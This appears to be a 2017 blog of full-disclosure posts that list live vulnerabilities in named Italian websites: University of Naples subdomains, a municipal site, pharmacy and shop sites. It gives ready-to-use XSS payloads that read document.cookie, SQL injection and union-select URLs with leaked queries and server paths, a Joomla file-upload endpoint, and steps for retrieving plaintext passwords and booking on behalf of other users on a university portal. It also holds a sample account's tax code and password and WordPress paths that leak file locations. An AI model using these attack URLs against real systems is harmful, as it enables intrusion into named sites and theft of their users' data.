Thursday, 23 November 2017

unina.it/ | blind sql injection, xss, data leak, system compromise etc




http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error:http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/


XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E



SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(news_data, '%d/%m/%Y') as data ,news_periodo_desc,news_titolo,news_testo,news_allegato_1,news_allegato_2,tnews_id from tnews where news_id = 62


Joomla! with several vulnerabilities:
http://www.diarc.unina.it/
http://www.ceinge.unina.it
http://www.master-ris.unina.it/
http://www.sicc-it.unina.it

___
http://www.concorsi.unina.it/
Passwords are stored in plain text (not hash) and can be retrieved for all the registered users.

Anybody can register and manipulate other accounts.
(sample fake account)
Codice Fiscale: RDLRLF80A01D247M
Password: RVENDOMIEU
 Nome:    radolfo
Cognome:     radolfo
Data di Nascita:     1/01/1980
Codice Fiscale:     RDLRLF80A01D247M
Password:     RVENDOMIEU
http://www.concorsi.unina.it/dottric/iscrizione/insertUser.jsp

http://www.concorsi.unina.it/dottric/IdentificazioneAmm.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Elenco.jsp
http://www.concorsi.unina.it/dottric/Amministrazione/recuperaPwd.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT131
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT111
http://www.concorsi.unina.it/dottric/visualizzazione/DettagliLingue.jsp?bando=DOTT131


__
http://www.sba.unina.it
uses the Glizy framework
The framework is outdated http://www.minervaeurope.org/structure/workinggroups/userneeds/prototipo/cms/download.html

/admin/index.php
MW/config/config.xml <--- where you can find the configuration data

______
http://www.medicinacds.unina.itI used the previously registered RDLRLF80A01D247M
 and, as suggested from the errors M3900XXXX, a random "matricola" nr M39001234
Anno: 6
Nome:    radolfo
Cognome:     radolfo


We can also force the booking/"prenotazione"  by choosing a different value for "scelta"
sample: http://www.medicinacds.unina.it/ade/rec_scheda.php?scelta=563

When submitting data we can subscribe/book other people, modify the submitted "matricola", get the user data (including password).


There's no need for an authorization/login to check the calendar
http://www.medicinacds.unina.it/ade/ade_calendarioperanno.php
archived:http://archive.is/9ws87



Several other problems on tomcat, outdated stuff and so on. Quite boring...
Note: I haven't modified any record or dumped/saved any confidential information.

Tuesday, 21 November 2017

http://mariorossi.it/ | XSS


http://mariorossi.it/categoria.cfm?cat=15&findcateg=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Friday, 17 November 2017

sefsas.it | sql injection



Sql Injection in the email confirmation url (there are several other):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

full query sample in output

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived:http://archive.is/xDVeh

Sunday, 12 November 2017



XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error:http://archive.is/9bJfo

Friday, 10 November 2017

http://www.informaprezzi.it/ | sql injection



http://www.informaprezzi.it/catalogo/gotourl.asp?idprod=[sql injection]

archived error:http://archive.is/spRdB

Monday, 6 November 2017

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path


Urls that can give you errors with local folder paths on Wordpress 4.8.3 and previous versions:

/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav-menu-control.php
/wp-includes/customize/class-wp-customize-nav-menu-item-control.php
/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php
/wp-includes/customize/class-wp-customize-nav-menu-location-control.php
/wp-includes/customize/class-wp-customize-nav-menu-name-control.php
/wp-includes/customize/class-wp-customize-nav-menu-section.php
/wp-includes/customize/class-wp-customize-nav-menu-setting.php
/wp-includes/customize/class-wp-customize-nav-menus-panel.php
/wp-includes/customize/class-wp-customize-new-menu-control.php
/wp-includes/customize/class-wp-customize-new-menu-section.php
/wp-includes/customize/class-wp-customize-sidebar-section.php
/wp-includes/customize/class-wp-customize-site-icon-control.php
/wp-includes/customize/class-wp-customize-theme-control.php
/wp-includes/customize/class-wp-customize-themes-section.php
/wp-includes/customize/class-wp-customize-upload-control.php
/wp-includes/customize/class-wp-widget-area-customize-control.php
/wp-includes/customize/class-wp-widget-form-customize-control.php


/wp-includes/ID3/module.audio-video.asf.php
/wp-includes/ID3/module.audio-video.flv.php
/wp-includes/ID3/module.audio-video.matroska.php
/wp-includes/ID3/module.audio-video.quicktime.php
/wp-includes/ID3/module.audio-video.riff.php
/wp-includes/ID3/module.audio.ac3.php
/wp-includes/ID3/module.audio.dts.php
/wp-includes/ID3/module.audio.flac.php
/wp-includes/ID3/module.audio.mp3.php
/wp-includes/ID3/module.audio.ogg.php
/wp-includes/ID3/module.tag.apetag.php
/wp-includes/ID3/module.tag.id3v1.php
/wp-includes/ID3/module.tag.id3v2.php
/wp-includes/ID3/module.tag.lyrics3.php

/wp-includes/IXR/class-IXR-clientmulticall.php
/wp-includes/IXR/class-IXR-introspectionserver.php

/wp-includes/Requests/Auth/Basic.php

/wp-includes/Requests/Exception/HTTP.php

/wp-includes/Requests/Exception/HTTP/304.php
/wp-includes/Requests/Exception/HTTP/305.php
/wp-includes/Requests/Exception/HTTP/306.php
/wp-includes/Requests/Exception/HTTP/400.php
/wp-includes/Requests/Exception/HTTP/401.php
/wp-includes/Requests/Exception/HTTP/402.php
/wp-includes/Requests/Exception/HTTP/403.php
/wp-includes/Requests/Exception/HTTP/404.php
/wp-includes/Requests/Exception/HTTP/405.php
/wp-includes/Requests/Exception/HTTP/406.php
/wp-includes/Requests/Exception/HTTP/407.php
/wp-includes/Requests/Exception/HTTP/408.php
/wp-includes/Requests/Exception/HTTP/409.php
/wp-includes/Requests/Exception/HTTP/410.php
/wp-includes/Requests/Exception/HTTP/411.php
/wp-includes/Requests/Exception/HTTP/412.php
/wp-includes/Requests/Exception/HTTP/413.php
/wp-includes/Requests/Exception/HTTP/414.php
/wp-includes/Requests/Exception/HTTP/415.php
/wp-includes/Requests/Exception/HTTP/416.php
/wp-includes/Requests/Exception/HTTP/417.php
/wp-includes/Requests/Exception/HTTP/418.php
/wp-includes/Requests/Exception/HTTP/428.php
/wp-includes/Requests/Exception/HTTP/429.php
/wp-includes/Requests/Exception/HTTP/431.php
/wp-includes/Requests/Exception/HTTP/500.php
/wp-includes/Requests/Exception/HTTP/501.php
/wp-includes/Requests/Exception/HTTP/502.php
/wp-includes/Requests/Exception/HTTP/503.php
/wp-includes/Requests/Exception/HTTP/504.php
/wp-includes/Requests/Exception/HTTP/505.php
/wp-includes/Requests/Exception/HTTP/511.php
/wp-includes/Requests/Exception/HTTP/Unknown.php

/wp-includes/Requests/Hooks.php
/wp-includes/Requests/Proxy/HTTP.php
/wp-includes/Requests/Transport/cURL.php
/wp-includes/Requests/Transport/fsockopen.php

/wp-includes/rest-api/class-wp-rest-response.php
/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php
/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php
/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php
/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php

/wp-includes/SimplePie/Cache/DB.php
/wp-includes/SimplePie/Cache/File.php
/wp-includes/SimplePie/Cache/Memcache.php
/wp-includes/SimplePie/Cache/MySQL.php
/wp-includes/SimplePie/Core.php

/wp-includes/class.wp-scripts.php
/wp-includes/class.wp-styles.php
/wp-includes/class-feed.php
/wp-includes/class-http.php
/wp-includes/class-IXR.php
/wp-includes/class-simplepie.php
/wp-includes/class-snoopy.php
/wp-includes/class-walker-category.php
/wp-includes/class-walker-category-dropdown.php
/wp-includes/class-wp-customize-panel.php
/wp-includes/class-walker-comment.php
/wp-includes/class-walker-nav-menu.php
/wp-includes/class-walker-page.php
/wp-includes/class-walker-page-dropdown.php
/wp-includes/class-wp-customize-control.php
/wp-includes/class-wp-customize-panel.php
/wp-includes/class-wp-customize-section.php
/wp-includes/class-wp-customize-setting.php
/wp-includes/class-wp-feed-cache.php
/wp-includes/class-wp-http-ixr-client.php
/wp-includes/class-wp-http-requests-hooks.php
/wp-includes/class-wp-http-requests-response.php
/wp-includes/class-wp-image-editor-gd.php
/wp-includes/class-wp-image-editor-imagick.php
/wp-includes/class-wp-simplepie-sanitize-kses.php
/wp-includes/class-wp-text-diff-renderer-inline.php
/wp-includes/class-wp-text-diff-renderer-table.php
/wp-includes/class-wp-user-meta-session-tokens.php
/wp-includes/class-wp-xmlrpc-server.php
/wp-includes/class.wp-scripts.php
/wp-includes/class.wp-styles.php
/wp-includes/compat.php
/wp-includes/default-filters.php
/wp-includes/default-widgets.php
/wp-includes/embed-template.php
/wp-includes/feed-atom-comments.php
/wp-includes/feed-atom.php
/wp-includes/feed-rss.php
/wp-includes/feed-rss2-comments.php
/wp-includes/feed-rss2.php
/wp-includes/functions.php
/wp-includes/locale.php
/wp-includes/media.php
/wp-includes/ms-default-filters.php
/wp-includes/ms-settings.php
/wp-includes/nav-menu-template.php
/wp-includes/registration-functions.php
/wp-includes/registration.php
/wp-includes/rss-functions.php
/wp-includes/rss.php
/wp-includes/script-loader.php
/wp-includes/session.php
/wp-includes/template-loader.php
/wp-includes/wp-diff.php
/wp-includes/vars.php
/wp-includes/update.php



/wp-content/plugins/hello.php



.... and more


Saturday, 28 October 2017

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise




Joomla com_fabrik vulnerabilities

raise the error related to sql injection
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived:http://archive.is/6XtTl

path (leaked from the errors)
/web/htdocs/www.comuneguardiasanframondi.gov.it/

Twitter Delicious Facebook Digg Stumbleupon Favorites More